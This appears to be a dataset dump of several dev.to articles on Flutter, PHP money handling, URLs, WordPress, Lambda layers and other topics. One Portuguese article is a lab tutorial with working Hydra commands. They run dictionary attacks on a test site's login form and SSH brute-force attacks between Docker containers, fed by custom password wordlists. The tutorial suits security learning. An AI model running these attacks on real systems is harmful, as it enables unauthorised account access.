class HomeScreen extends StatefulWidget {
const HomeScreen({super.key});
@override
State<HomeScreen> createState() => _HomeScreenState();
}
class _HomeScreenState extends State<HomeScreen> {
List<ListOfData> _list = [];
Future<List<ListOfData>> getAllData() async {
try {
final response =
await http.get(Uri.parse('https://fakestoreapi.com/products'));
if (response.statusCode == 200) {
final data = jsonDecode(response.body);
_list = data.map<ListOfData>((e) => ListOfData.fromJson(e)).toList();
debugPrint('${_list.length}');
return _list;
} else {
debugPrint(
'Error in API call Please check your backend and URL carefully');
}
return _list;
} catch (e) {
debugPrint('$e');
}
return _list;
}
@override
Widget build(BuildContext context) {
return Scaffold(
body: FutureBuilder(
future: getAllData(),
builder: (context, snapshot) {
if (snapshot.hasData) {
return ListView.builder(
itemCount: _list.length,
shrinkWrap: true,
itemBuilder: (context, index) {
return ListTile(
title: Text('${_list[index].title}'),
subtitle: Text('${_list[index].description}'),
leading: SizedBox(
height: 50,
width: 50,
child: CachedNetworkImage(
imageUrl: '${_list[index].image}',
progressIndicatorBuilder: (context, url, progress) =>
CircularProgressIndicator(
value: progress.progress),
),
),
trailing: Text('${_list[index].price}'),
);
});
} else if (snapshot.hasError) {
return const Text("Error");
}
return const Text("No Data");
}),
);
}
}
```
This code represents a Flutter StatefulWidget named HomeScreen that fetches data from a specified API endpoint and displays the information in a ListView.
Here's a breakdown of the code:
Import Statements
Various package imports are included such as material from Flutter, http for making HTTP requests, cached_network_image for efficiently loading and caching network images, and json for encoding and decoding JSON data.
HomeScreen Class
HomeScreen is a StatefulWidget representing the main screen of the application.
_HomeScreenState Class
_HomeScreenState manages the state for the HomeScreen.
State Variables
_list is a list of ListOfData objects.
getAllData Method
getAllData is an asynchronous function that makes an HTTP GET request to 'https://fakestoreapi.com/products' to fetch data.
If the response status is 200 (OK), the JSON response is decoded and used to populate the _list by mapping the JSON data to ListOfData objects (presumably defined in 'list_of_response.dart').
Debug print statements are used to display the count of items fetched or any error encountered during the API call.
build Method
The build method configures the UI for the HomeScreen.
It displays a Scaffold containing a FutureBuilder that waits for the result of getAllData.
When data is received, it displays a ListView.builder widget, populating the list with data fetched from the API.
Each list item is represented by a ListTile containing text fields for the title, description, and price. It also includes a CachedNetworkImage widget for loading and displaying the product image.
The FutureBuilder is responsible for showing different UI components based on the current state of the asynchronous operation:
If data is available, it displays the list of items fetched from the API.
If there is an error during the API call, it shows an error message.
If no data is available, it displays a message indicating the absence of data.
This code provides a basic structure to fetch data from an API and display it in a list format, including images loaded from network URLs using the cached_network_image package to ensure efficient caching and loading of images in the Flutter app.
Both sample codes illustrate practical implementations of making HTTP requests in Flutter using the http package. The first code focuses on creating data through a POST request, while the second code emphasizes retrieving and displaying data via a GET request.
Continuing the article with a discussion on best practices, error handling, and the nuances of using Flutter's HTTP library would complement the multimedia content and provide a comprehensive guide for readers interested in networking with Flutter applications. | raman04byte |
1,659,831 | Money pattern in PHP: the problem | Introduction When we work with numbers, we may face moments when we lose precision, maybe... | 25,302 | 2023-11-15T09:00:00 | https://dev.to/rubenrubiob/money-pattern-in-php-the-problem-334a | php, designpatterns, money, number | ## Introduction
When we work with numbers, we may face moments when we lose precision, maybe because the number is gigantic or maybe because it has infinite decimals. The problem is representing infinite numbers in a finite system; no matter how much memory you have, it will always be finite. This number representation is known as [floating point (IEEE 754)](https://en.wikipedia.org/wiki/IEEE_754).
Depending on the case, the problem might be serious. For instance, in an e-commerce, a precision error may result in charging less money to a client, resulting in a loss of money for our company. Or we may charge her more, starting a possible legal problem.
I encountered such a problem on a project I collaborated on. Imagine we have two products in this store: one with a final price of €5.50 and the other with a final price of €5.30. If a client buys five units of each, we would expect a bill like the following one:
| Base price (€) | VAT (21%) (€) | Final price (€) |
|:--|:--|:--|
| 4.55 | 0.95 | 5.50 |
| 4.55 | 0.95 | 5.50 |
| 4.55 | 0.95 | 5.50 |
| 4.55 | 0.95 | 5.50 |
| 4.55 | 0.95 | 5.50 |
| 4.38 | 0.92 | 5.30 |
| 4.38 | 0.92 | 5.30 |
| 4.38 | 0.92 | 5.30 |
| 4.38 | 0.92 | 5.30 |
| 4.38 | 0.92 | 5.30 |
| **44.65** | **9.35** | **54.00** |
For the legal bill, each product had to show the price broken down. Thus, to calculate the final price, the software used the base price and then calculated the VAT and the final price. Trying to prevent the problem with floating point numbers, up until three decimal values were stored.
However, these calculations were not done in one place and stored for the rest of the flow; they were done in every place the price was shown. And this calculation was not performed in the same way in all places: in one place, the base price was rounded first, in others, it was rounded to the final price…
Therefore, we found that the summary the client saw before paying was
| Base price (€) | VAT (21%) (€) | Final price (€) |
|:--|:--|:--|
| 4.545 | 0.9545 | 5.4995 |
| 4.545 | 0.9545 | 5.4995 |
| 4.545 | 0.9545 | 5.4995 |
| 4.545 | 0.9545 | 5.4995 |
| 4.545 | 0.9545 | 5.4995 |
| 4.380 | 0.9198 | 5.2998 |
| 4.380 | 0.9198 | 5.2998 |
| 4.380 | 0.9198 | 5.2998 |
| 4.380 | 0.9198 | 5.2998 |
| 4.380 | 0.9198 | 5.2998 |
| **44.625** | **9.372** | **53.997** |
Instead, the bill the client received was the following one:
| Base price (€) | VAT (21%) (€) | Final price (€) |
|:--|:--|:--|
| 4.550 | 0.9555 | 5.5055 |
| 4.550 | 0.9555 | 5.5055 |
| 4.550 | 0.9555 | 5.5055 |
| 4.550 | 0.9555 | 5.5055 |
| 4.550 | 0.9555 | 5.5055 |
| 4.380 | 0.9198 | 5.2998 |
| 4.380 | 0.9198 | 5.2998 |
| 4.380 | 0.9198 | 5.2998 |
| 4.380 | 0.9198 | 5.2998 |
| 4.380 | 0.9198 | 5.2998 |
| **44.65** | **9.38** | **54.03** |
Beyond the inconsistencies in the calculations, a result of ignorance of good practices, the real problem was that the expected result was never obtained. How could we have performed the calculations? Where did we have to round the values?
## Rounding in PHP
In PHP, we have several functions to round numbers:
- `floor($amount)`: Returns the next lowest integer value (as float) by rounding down value if necessary.
- `ceil($value)`: Returns the next highest integer value by rounding up value if necessary.
- `round($amount, $precision, $mode)`: Returns the rounded value of val to specified precision (number of digits after the decimal point). Precision can also be negative or zero (default).
- `number_format($amount, $decimals)`: Formats a number with grouped thousands and optionally decimal digits.
Which of these functions did we need to use? And how? The answer is none of them. In any case, we would have ended up losing precision anyway.
## Money pattern
Money pattern
Actually, we are not facing the problem correctly. Besides an amount, a price also has a currency. When we say a product costs 10, what do we mean? €10? $10? ¥10? The price will vary if we do not take the currency into account. Precisely, the currency indicates the number of decimal values for an amount, i.e., the minor unit. This is something we can use to store prices.
In that line of thought, there is [the money pattern](https://www.martinfowler.com/eaaCatalog/money.html). It consists of using a value object with two attributes: the currency and the amount in the minor unit. Thus, €89.99 would be stored as 8999.
## Libraries
In PHP, there are open-source libraries that implement the money pattern, thus solving both problems at once: working with big numbers (up to a limit) and having prices with amount and currency.
The most important ones are:
- [brick/money](https://github.com/brick/money)
- [moneyphp/money](https://github.com/moneyphp/money)
Internally, both use PHP's [`BCMath`](https://www.php.net/manual/en/book.bc.php) extension to perform calculations, representing numbers as `string` or `int`, so there is no losing of decimal values.
[There is a comparison between both libraries](https://github.com/brick/money/issues/28). However, any of the two is a good option to perform calculations safely.
## Conclusions
We saw the problems that arise when working with floating point numbers. Neither of PHP’s native functions for rounding is a solution.
To work with prices, the solution consists of using the money pattern. There are libraries in PHP that implement it using the BCMath extension, so the calculations are safely done (up to a limit).
In the next post, we will see an implementation that correctly solves the example we saw in the introduction. | rubenrubiob |
1,659,967 | JavaScript Beast on the Block | Hello world... If you are looking to learn from an expert... And take your programming to the next... | 0 | 2023-11-07T22:02:30 | https://dev.to/erasmuskotoka/javascript-beast-on-the-block-4n30 | Hello world...
If you are looking to learn from an expert...
And take your programming to the next level...
Or in search of someone to take on your programming projects...
Then look no further because I am the Programming Beast on the block.
I am about to reshape the future with code one line at a time.
I am knowledgeable in JavaScript and React with over four years programming experience.
Having worked with over fifty clients and turned their projects into masterpieces...
I dare say that I have the key to unlock your next programming project.
Ready for the magic?
Just send a DM or an Email and let's get started.
Keep your eyes locked on the TL for more. | erasmuskotoka | |
1,660,062 | Realizando ataques de força bruta em containers docker usando hydra | Neste post iremos entender como usar a ferramenta hydra para ataques de força bruta e de dicionário... | 0 | 2023-11-20T22:40:13 | https://dev.to/cancio/testando-o-hydra-com-o-docker-3ceg | hydra, docker, kali, linux | Neste post iremos entender como usar a ferramenta hydra para ataques de força bruta e de dicionário através de um site ou de um computador para outro. Podemos entender por definição:
> Um **ataque de dicionário** é um ataque às senhas que **usa palavras ou frases comuns encontradas em dicionários para comprometer credenciais de usuários**. Caso seja uma pessoa que usa palavras do dicionário ou frases comuns como senha, você corre o risco de ser vítima de um ataque de dicionário. Fonte: [Keeper Security](https://www.keepersecurity.com/pt_BR/threats/dictionary-attack.html#:~:text=Um%20ataque%20de%20dicion%C3%A1rio%20%C3%A9,de%20um%20ataque%20de%20dicion%C3%A1rio.)
> Brute Force é um ataque “Hacker” usado para tentar descobrir a combinação certa de uma senha, tentando várias combinações diferentes. O ataque pode ser feito de forma manual, colocando as senhas uma por vez até que a verdadeira seja encontrada. Fonte: [Brasil Cloud](https://brasilcloud.com.br/brute-force-o-que-e-e-como-se-prevenir/#:~:text=Como%20funciona%20e%20para%20que,que%20a%20verdadeira%20seja%20encontrada.)
Para realizar os ataques utilizaremos um ambiente controlado usando containers docker. Para você que é leigo com docker digamos que os dockers podem ser usados como máquinas virtuais mas de uma forma mais simples e leve, como se criar uma máquina vitual fosse como preparar uma lasanha do zero e o docker fosse uma lasanha pronta para esquentar no microondas. Ao invés de gastarmos tempo preparando os ingredientes basta pegar uma imagem pronta (seu sabor de lasanha favorito) e a partir dela preparar o seu almoço (container docker).
A imagem que vamos usar é a [cancitoo/kali-linux-ssh-hydra](https://hub.docker.com/r/cancitoo/kali-linux-ssh-hydra) basta ir na sua maquina e digitar o comando abaixo (é preciso ter o docker instalado na sua máquina):
```bash
docker pull cancitoo/kali-linux-ssh-hydra
```
A aqui já temos o necessário para relizar nosso laboratório.
# Usando ataque de dicionário em um site
Para esse ataque iremos criar a nossa primeira máquina, aqui no exemplo usaremos o seguinte comando:
```bash
docker run --name pc01 -p 6050:22 -i -t cancitoo/kali-linux-ssh-hydra bash
```
Nesse comando criamos um container chamdo `pc01` e sua porta 22 será a 6050 da máquina real, ele também já abre nossa máquina no terminal como um bash. A partir daqui já usando no terminal a nossa máquina `pc01`. Caso no futuro você queira acessa novamente a `pc01` basta digitar o comando abaixo:
```bash
#para executar um container ja aberto
docker exec -it pc01 /bin/bash
```
Pronto! Nossa máquina já está pronta para fazer o ataque! Nesse caso, vamos usar atacar o site `http://testphp.vulnweb.com/login.php` com o comando abaixo:
``` bash
hydra testphp.vulnweb.com http-form-post "/userinfo.php:uname=^USER^&pass=^PASS^:login page" -l test -p 0000 -t 10
```
Aqui podemos observar que o hydra faz o ataque via uma requisição http inserindo os valores de user com a flag `-l` e senha `-P` de forma respectiva nos parametros `USER` e `PASS` dentro endereço usado. O ataque deu errado pois a senha do comando acima `0000` não é a correta. Agora vamos montar em `pc01` nosso próprio dicionário. Digite o comando abaixo:
```bash
nano /tmp/pass.txt
```
vai aparece o editor nano, coloque nele uma lista de possíveis senhas:
```txt
0000
1234
4321
3434
4545
teste
nome
nada
```
Agora vamos rodar novamente o comando mas desta vez com a flag de password em maiusculo usando nosso novo arquivo `/tmp/pass.txt`:
``` bash
hydra testphp.vulnweb.com http-form-post "/userinfo.php:uname=^USER^&pass=^PASS^:login page" -l test -P /tmp/pass.txt -t 10
```
Desta vez o docker irá rodar todo o arquivo `/tmp/pass.txt` procurando a senha correta. Assim ocorre o ataque de força brutaa. Dest vez vai dar certo o ataque pois a senha correta `teste` consta no nosso dicionário.
# atacando uma maquina para a outra via ssh
Agora vamos criar uma nova máquina `pc02` semelhante ao que fizemos com `p01`:
```bash
docker run --name pc02 -p 6051:22 -i -t cancitoo/kali-linux-ssh-hydra bash
#para executar um container ja aberto
docker exec -it pc02 /bin/bash
```
Repare que dessa vez a porta 22 é a 6051 da maquina real. Vamos adicionar uma camada de segurança em `pc02`. Por padrão o container não vem com senha, para configurar a senha de `pc02` basta digitar o comando abaixo e seguir as instruções:
```bash
#para gerar uma senha pro root
passwd
```
Agora vamos configurar o ssh na máquina `pc02`. Isso vai permitir conexão ssh de `pc01` para `pc02`:
```bash
#definir da chave de acesso remota
ssh-keygen -A
#iniciar o serviço SSH
service ssh start
```
Voltando para `pc01` vamos adicionar senha criada em `pc02` no nosso dicionário e criar um novo dicionário com logins:
```bash
# Atualizar dicionario com senha
nano /tmp/pass.txt
# criar lista de possíveis usuários
nano /tmp/users.txt
```
Aqui vai um exemplo para `/tmp/users.txt`
```txt
pedro
carlo
root
admin
```
Mas ainda falta saber qual o ip de `pc02`, para isso vamos rodar esse comando em um terminal à parte:
abaixo:
```bash
docker inspect -f "{{ .NetworkSettings.IPAddress }}" pc02
```
Vamos fazer de conta que a respota veio `172.17.0.2`. Agora basta executar hydra na porta de ataque
```bash
hydra -L /tmp/users.txt -P /tmp/pass.txt 172.17.0.2 ssh
``` | cancio |
1,660,118 | Neuromorphic Computing: A Comprehensive Guide | Introduction Neuromorphic computing is an intriguing and fast expanding area that... | 0 | 2023-11-08T04:06:57 | https://dev.to/adityapratapbh1/neuromorphic-computing-a-comprehensive-guide-1885 | computing, neuromorphic |
[](https://cloudnativejourney.files.wordpress.com/2023/11/pexels-photo-1714208.jpeg?w=1024 "Computing")
Introduction
------------
Neuromorphic computing is an intriguing and fast expanding area that creates brain-like computer systems by drawing inspiration from the human brain. In this essay, we will look at the basics of neuromorphic computing, its components, and its applications in artificial intelligence and computing.
Neuromorphic Computing Basics
-----------------------------
### Terminology
Before we delve into the structure of neuromorphic computing, let's familiarize ourselves with some key terminology:
* **Neuromorphic Hardware**: Specialized hardware designed to mimic the behavior of biological neural systems.
* **Neurons**: Fundamental units of computation that process and transmit information in neuromorphic systems.
* **Synapses**: Connections between neurons that enable information transmission and learning.
* **Spiking Neural Networks (SNNs)**: Neural network models that use spikes or pulses for information representation and processing.
* **Event-Driven Processing**: Processing of data based on events or spikes, leading to low power consumption.
### System Structure
Neuromorphic computing systems are structured to emulate the biological brain's neural networks and synapses. The key components include:
* **Neuromorphic Hardware**: Specialized chips or hardware platforms designed to run SNNs efficiently.
* **Neurons and Synapses**: Emulated neurons and synapses that process information in an event-driven manner.
* **Software Frameworks**: Tools and frameworks for designing and simulating SNNs.
* **Applications**: Use cases in artificial intelligence, robotics, and neuroscience research.
Neuromorphic Computing Development
----------------------------------
### Hardware Advancements
Advancements in neuromorphic hardware have been a driving force behind the field's progress. Specialized chips and platforms designed for efficient SNN execution have emerged, allowing for real-time event-driven processing.
### Spiking Neural Networks (SNNs)
Spiking neural networks are the primary models used in neuromorphic computing. They use spikes or pulses to represent and transmit information, similar to the electrical impulses in biological neurons. SNNs are well-suited for event-driven processing and offer advantages in terms of power efficiency.
### Software Frameworks
Various software frameworks and tools have been developed to facilitate the design and simulation of SNNs. These frameworks enable researchers and developers to experiment with neuromorphic models and applications.
Applications of Neuromorphic Computing
--------------------------------------
Neuromorphic computing has found applications in diverse fields, including:
* **Artificial Intelligence**: Neuromorphic computing is used to develop energy-efficient AI systems for tasks like image and speech recognition.
* **Robotics**: Neuromorphic hardware and algorithms enable robots to process sensory information in real time and perform complex tasks efficiently.
* **Neuroscience Research**: Neuromorphic systems are employed to better understand the brain's neural processes and behaviors.
Advantages and Challenges
-------------------------
### Advantages of Neuromorphic Computing
* **Energy Efficiency**: Event-driven processing and low power consumption make neuromorphic computing suitable for edge and mobile devices.
* **Real-time Processing**: Neuromorphic systems can process data in real time, enabling responsive AI and robotics applications.
* **Biologically Inspired**: Neuromorphic computing draws inspiration from the human brain, leading to more brain-like computing systems.
### Challenges of Neuromorphic Computing
* **Complexity**: Designing and programming SNNs can be challenging due to their complex spiking behavior.
* **Hardware Development**: Developing efficient neuromorphic hardware is a costly and specialized endeavor.
* **Integration**: Integrating neuromorphic systems with existing AI and computing infrastructure can be complex.
Conclusion
----------
Neuromorphic computing is an exciting and creative field that uses human brain principles to construct energy-efficient, real-time computer devices. Its applications in artificial intelligence, robotics, and neuroscience research are changing how we approach complicated tasks and data processing. While there are limitations, the future of neuromorphic computing offers immense promise for developing technology and our knowledge of the computational principles of the brain. | adityapratapbh1 |
1,660,199 | Understanding parts of URL | Understanding parts of an URL In the context of web development, the URL path refers to... | 0 | 2023-11-08T05:31:52 | https://dev.to/tanmaycode/understanding-parts-of-url-1n1g | webdev, javascript, programming, beginners | ### Understanding parts of an URL
In the context of web development, the URL path refers to the part of the URL that comes after the domain name and includes various parameters and components. These parameters are used to provide additional information to the server or to specify certain resources or actions. Here are some common parameters that can be present in the URL path:
1. **Protocol:**
- The protocol specifies the communication protocol being used. Common examples include HTTP, HTTPS, FTP, and more.
- Example: `https://www.example.com`
2. **Domain Name:**
- The domain name identifies the specific web domain being accessed. It represents the unique address of the website or web application.
- Example: `https://www.example.com`
3. **Port:**
- The port number is used to identify a specific process or application on a server. It is often included in the URL to specify the destination port for the communication.
- Example: `https://www.example.com:8080`
4. **Path:**
- The path specifies the specific resource or location within the web server. It follows the domain name and may include one or more path segments separated by slashes.
- Example: `https://www.example.com/products/electronics`
5. **Query Parameters:**
- Query parameters provide additional data to the server and are appended to the URL after a question mark. They consist of key-value pairs separated by ampersands.
- Example: `https://www.example.com/search?q=keyword&page=1`
6. **Anchor or Fragment Identifier:**
- The anchor or fragment identifier is used to identify a specific location within a web page. It is indicated by a hash symbol followed by the anchor name.
- Example: `https://www.example.com/about#section2`
Understanding these different parameters in the URL path is essential for handling various types of requests, parsing the incoming data, and directing the user to the appropriate resources or actions on the server-side application. | tanmaycode |
1,660,301 | @iaminebriki at Hacktoberfest ✨ | This year was first time I participate to Hacktoberfest and It's been such a nice experience! ... | 0 | 2023-11-08T07:32:19 | https://dev.to/iaminebriki/iaminebriki-at-hacktoberfest-11i1 | hack23contributor, hacktoberfest23, hacktoberfest, opensource | This year was first time I participate to Hacktoberfest and It's been such a nice experience!
### Intro
I am a Machine learning Engineer and freelancer interested in the intersection of AI and Healthcare (Medical Imaging specifically).
I've been interested in Open-source for a while now but didn't know where exactly I can fit in, Hacktoberfest seem to have introduced me x) ✨
You can check me out on Github at [@iaminebriki](https://github.com/iaminebriki)
### Highs and Lows
As little as I did to this project but It was great to have joined [@Numpy](https://github.com/numpy/numpy) as a contributor after I have their official SVG logo files where it wasn't rendering their colors right on Figma and it feels great to take part of such a foundational library in Python that is dedicated to scientific computing and used by millions around the world ✨
My PR: [DOC: correct Logo SVG files rendered in dark by Figma](https://github.com/numpy/numpy/pull/24975)
I have also worked on some other projects:
In [free-programming-books](https://github.com/EbookFoundation/free-programming-books) which is a great repo collecting free programming books from all over the web in many languages sorted by subject and by programming languages, I have added some fee e-books too.
=>[Added 3 'Notes for Professionals' books](https://github.com/EbookFoundation/free-programming-books/pull/10884)
I've also designed some logos with Figme for [skill-icons](https://github.com/iaminebriki/skill-icons) which you can use in your GitHub profile Readme.
=> [Updated/added 26 logos (with Light and Dark themes) designed with official materials](https://github.com/tandpfun/skill-icons/pull/575)
Also found a nice initiative project [Data-Science-Flashcards](https://github.com/klaus78/Data-Science-Flashcards) which is a [website](https://klaus78.github.io/Data-Science-Flashcards) for Flashcards in Data Science, Machine Learning, Deep Learning and more for people to catch-up or to get to know these fields.
=> [My contributions](https://github.com/klaus78/Data-Science-Flashcards/commits?author=iaminebriki)
### Growth
Hacktoberfest 2023 was a great chance to hit some Git commands on the Terminal x)
I've learned not only to push code but to communicate raising issues to suggest features and discuss changes, learned also to document and follow contributions guidelines and resolving GitHub Actions conflicts ✨
So thank you #hacktoberfest for giving us the motive to leave some touch in the Open-source community, I'm looking forward to some more serious contributions to some great repos out there ✨
Shoutout to [Tree Nation](https://tree-nation.com/about-us) for offering to plant a tree on mybehalf on their missing to offset CO2 emissions.
Check out [my "Markhamia lutea" Tree](https://tree-nation.com/trees/view/5280633) in Northeast Tanzania that is and will be responsible of 7.00 Kg less CO2 every year for about 150 years (Markhamia lutea's average lifetime) :D
 | iaminebriki |
1,660,464 | Why is WordPress Popular? | WordPress is a popular and widely-used Content Management System (CMS) for several reasons that... | 0 | 2023-11-08T11:12:18 | https://dev.to/pogo_themes/why-is-wordpress-popular-3jl9 | wordpress, seo, cms, beginners | WordPress is a popular and widely-used Content Management System (CMS) for several reasons that contribute to its reputation as one of the best CMS options. However, it's important to note that what makes WordPress the "best" CMS can be subjective and depends on your specific needs and preferences.
Here are some of the key reasons why WordPress is often considered a top choice:
**User-Friendly:**
WordPress is known for its ease of use. It has a straightforward and intuitive interface that allows users with varying levels of technical expertise to create and manage websites.
Extensive Community and Support: WordPress has a vast and active user community, which means you can find a wealth of tutorials, forums, and documentation to help you address any issues or questions you may encounter.
**Customizability:**
WordPress offers a wide range of themes and plugins that enable you to customize your website's design and functionality. You can find both free and premium options to suit your specific needs.
**SEO-Friendly:**
WordPress is designed with search engine optimization (SEO) in mind, and there are numerous plugins available (e.g., Yoast SEO) to help you optimize your website's content for search engines.
**Responsive Design:**
Many WordPress themes are built to be mobile-responsive, ensuring that your website looks and functions well on various devices, including smartphones and tablets.
**Security:**
WordPress takes security seriously and regularly releases updates to address vulnerabilities. Additionally, there are security plugins available to enhance your site's protection.
**Content Management:**
WordPress excels at managing and organizing content. It allows you to create and publish posts, pages, and multimedia content with ease.
**Scalability:**
WordPress can be used to build anything from simple blogs to complex, large-scale websites. It is a versatile platform that can grow with your evolving needs.
**Community and Developer Ecosystem:**
WordPress has a vast and active community of developers and designers, making it easier to find experts for custom development and design work if needed.
**Cost-Effective:**
WordPress is open-source software, which means it's free to use. While there may be costs associated with premium themes, plugins, hosting, and other services, it can be a cost-effective choice for many users.
**Multilingual Support:**
WordPress supports multiple languages, making it accessible to a global audience.
Despite these advantages, it's important to recognize that no CMS is universally perfect for everyone. Your choice of a CMS should depend on your specific requirements, such as the type of website you're building, your technical proficiency, and your budget.
You may also want to read about [why WordPress sucks](https://pogothemes.com/why-wordpress-sucks/)?
Different CMS options, such as Joomla, Drupal, and Wix, may be better suited to different use cases, so it's essential to evaluate your needs and compare various platforms before making a decision.
## Some statistics to give you an idea of how popular WordPress is
**Market Share:**
According to W3Techs, as of January 2022, WordPress was used by approximately 41% of all websites on the internet. This includes both small personal blogs and major websites of Fortune 500 companies and major news outlets.
**Content Management System Usage:**
WordPress dominates the CMS market. It was used by around 64% of all websites that used a CMS. Joomla and Drupal, other popular CMSs, had a much smaller market share in comparison.
**Global User Base:**
WordPress has a global user base, with millions of users and developers around the world. It is available in over 200 languages, making it accessible to a diverse range of people.
**Plugin and Theme Ecosystem:**
The WordPress ecosystem includes over 58,000 plugins and thousands of themes in the official WordPress.org repository. This vast library of resources highlights the popularity of the platform.
**Community and Events:**
WordPress has a thriving community, with numerous WordCamps and WordPress Meetups happening globally. These events attract thousands of attendees, showcasing the enthusiasm and popularity of the platform.
**Major Websites and Brands:**
Many well-known brands and major websites use WordPress, including The New Yorker, BBC America, TechCrunch, and The White House, among many others.
## Why WordPress is the best platform for SEO?
WordPress is often considered an excellent platform for search engine optimization (SEO) due to several factors that contribute to its SEO-friendliness. While it may not be the absolute best platform for every SEO scenario, it offers numerous advantages in this regard:
**SEO-Friendly Architecture:**
WordPress is built with clean and well-structured code, which search engines prefer. It generates SEO-friendly URLs and allows you to customize and optimize these URLs for better search engine visibility.
**SEO Plugins:**
WordPress offers a variety of powerful SEO plugins, with Yoast SEO and All in One SEO Pack being two of the most popular ones. These plugins provide tools for on-page SEO, meta tags, sitemaps, and more.
**Content Management:**
WordPress makes it easy to create and manage content, which is a fundamental aspect of SEO. You can easily publish and organize text, images, videos, and other content types, allowing you to create high-quality, SEO-optimized content.
**Mobile Responsiveness:**
Many WordPress themes are designed to be mobile-responsive, ensuring that your website is well-optimized for mobile users, which is increasingly important for SEO since search engines consider mobile-friendliness in rankings.
**Speed and Performance:**
WordPress allows you to optimize your site's speed and performance, which is crucial for SEO. You can use caching plugins, optimize images, and choose a reliable hosting provider to ensure fast page loading times.
**Regular Updates:**
WordPress regularly releases updates to improve security, fix bugs, and enhance performance. Keeping your WordPress installation and plugins up-to-date helps maintain a secure and well-performing website, which is a positive signal for SEO.
**User-Friendly Design:**
WordPress's user-friendly interface means you can quickly implement SEO best practices without needing extensive technical knowledge. This accessibility is useful for small business owners, bloggers, and anyone who wants to manage their site's SEO.
**Community and Resources:**
WordPress has a vast and active community, which means you can find plenty of tutorials, forums, and documentation to help you with SEO-related questions and challenges.
While WordPress offers many advantages for SEO, it's essential to note that SEO success also depends on the quality of your content, keyword research, backlinks, and other off-page factors. WordPress can help you with on-page SEO, but you'll still need to focus on other SEO aspects to achieve the best results.
Additionally, the "best" platform for SEO can vary depending on your specific needs and preferences, so it's important to choose the platform that aligns with your goals and expertise.
Check out PogoThemes for [Free WordPress Themes](https://pogothemes.com/). | pogo_themes |
1,660,661 | Stop using Lambda Layers (use this instead) | This post is also available on YouTube: Lambda layers are a special packaging mechanism provided... | 0 | 2023-11-08T13:38:26 | https://aaronstuyvenberg.com/posts/why-you-should-not-use-lambda-layers | aws, lambda, webdev, programming | This post is also available on YouTube:
{% embed https://www.youtube.com/embed/Y4EJPIpqmuk?si=tzscV5es_MaXigPs %}
[Lambda layers](https://docs.aws.amazon.com/lambda/latest/dg/chapter-layers.html) are a special packaging mechanism provided by AWS Lambda to manage dependencies for zip-based Lambda functions. Layers themselves are nothing more than a _sparkling_ zip file, but they have a few interesting properties which prove useful in some cases. Unfortunately Lambda layers are also difficult to work with as a developer, tricky to deploy safely, and typically don't offer benefits over native package managers. These downsides frequently outweigh the upsides, and we'll examine both in detail.
By the end of this post, you'll understand the pitfalls of general Lambda layer use as well as the niche cases where layers may make sense.
## Busting Lambda layer Myths
When I ask developers why they are using Lambda layers I often learn the underlying reasons are misguided. It's not their fault entirely, the [documentation](https://docs.aws.amazon.com/lambda/latest/dg/chapter-layers.html) makes some imprecise claims which may perpetuate these myths.
### Lambda layers do not circumvent the 250mb size limit
I frequently hear folks say they are leveraging Lambda layers to "raise the 250mb limit placed on zip-based Lambda functions". That's simply *not true*. The size of the unzipped function *and all attached layers* [must be less than 250mb](https://docs.aws.amazon.com/lambda/latest/dg/gettingstarted-limits.html).
This misunderstanding springs from the very first point in the documentation which states that Lambda layers "reduce the size of your deployment packages". While technically it is true that the specific *function code* you deploy can be reduced with layers, the overall size of the function when it runs in Lambda does not change.
This leads me to my next point.
### Lambda layers do not improve or reduce cold start initialization duration
Developers often mistake that a "reduced deployment package" size will reduce cold start latency. This is also untrue, as we already know that the [code you load](https://twitter.com/astuyve/status/1716125268060860768) is the single largest contributor to cold start latency. Whether or not these bytes come from a layer or simply the function zip itself is irrelevant to the resulting initialization duration.
## Development pain with Layers
One of the biggest challenges for developers leveraging Lambda layers is that they appear `magically` when a handler executes. While that feat is impressive technically, it poses an issue for developers as text editors and IDEs expect dependencies to be locally available, as do bundlers, test runners, and lint tools. If you run your function code locally or use an emulator, only a subset of those tools cooperate with layers. Although solving these issues is possible, external dependencies provided by Lambda layers require special consideration and handling for limited benefit.
Often, the process of building and deploying Layers separately is enough to avoid them, but there are other reasons to avoid Lambda layers.
## Cross-architecture woes
We're writing software for a world which is increasingly powered by ARM chips. It may be your shiny new M3 laptop, or Amazon's own (admittedly excellent) [Graviton](https://aws.amazon.com/blogs/aws/aws-lambda-functions-powered-by-aws-graviton2-processor-run-your-functions-on-arm-and-get-up-to-34-better-price-performance/) processor. Your Lambda functions are likely running on x86 or a combination of ARM and x86 processors today.
Lambda layers *do* support metadata attributes called "supported runtimes" and "supported architectures", but these are merely _labels_. They don't prevent or enforce any runtime or deployment time compatibility. Imagine your surprise when you attach a binary compiled for x86 to your arm-based Lambda function and receive `exec format` errors!
[I demonstrated this failure live](https://youtu.be/LrenCkwFhZs?t=4917)
## Deployment difficulties
Lambda layers do not support semantic versioning. Instead, they are immutable and versioned incrementally. While this does help prevent unintentional upgrading, incremental versioning offers no clues as to backwards compatibility or changes in the updated layer package. Additionally, Lambda layers are completely runtime agnostic and offer no manifest, lockfile, or packaging hints. Layers don't provide a `package.json`, `pyproject.toml`, or `gemspec` file to ensure adequate dependency resolution. Instead it's incumbant on the authors to only package compatible code.
One of the main selling points of Lambda layers is that they can share common dependencies between many functions, which is great if every function requires exactly the same compatible version of a dependency. But what happens when you want to upgrade a major version?
You'll need to release a new version of the layer with the new major version, ensure that no developer accidentally applies the incrementally-adjusted layer (remember – no semantic versioning, manifest files, or lockfiles!), and then simultaneously upgrade the Lambda function code and layer at the same time.
But even _that_ doesn't work out automatically, as I've [already documented](https://aaronstuyvenberg.com/posts/lambda-arch-switch). Deploying a function + layer results in two separate, asynchronous API calls. `updateFunction` updates the function *code* while `updateFunctionConfiguration` updates the *configured layers*, and both of these are *separate* control plane operations which can happen in parallel. This means that invoking `$LATEST` will fail until both calls complete. To avoid this you'll need to create a new function _version_, apply the new layer, and then update your integration (eg: ApiGateway) to point to the new alias, after both steps are complete.
Now semantic versioning is not perfect, and flexible specification (eg: `~` or `^` for relative versions) means that the combination of bits executing your Lambda function may run together for the very first time in a staging or production environment. This has caused enough issues that package managers have solutions like `npm shrinkwrap`, but this can be even worse with Lambda layers.
And that's the gist of my point – this is what your package manager should be doing.
## Dependency collisions
